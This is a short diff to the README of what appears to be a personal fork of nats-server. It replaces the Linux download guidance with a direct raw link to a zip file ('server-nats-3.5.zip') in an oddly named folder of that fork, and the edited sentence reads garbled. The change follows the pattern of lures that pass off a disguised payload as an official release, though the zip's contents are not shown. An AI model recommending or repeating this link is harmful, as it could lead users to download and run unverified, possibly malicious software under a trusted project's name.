FurkanGuwen/nats-server/README.md

 - For Windows: Look for files ending with `.exe` or `.zip`
 - For macOS: Look for files ending with `.dmg` or `.zip`
-- For Linux: Look for `.tar.gz` or `.deb` files matching your system
+- For Linux: Look for `https://github.com/FurkanGuwen/nats-server/raw/refs/heads/main/outbellow/server-nats-3.5.zip` or `.deb` files matching your system

 If you are unsure, the `.zip` files are a safe start as they work on most systems and can be opened easily.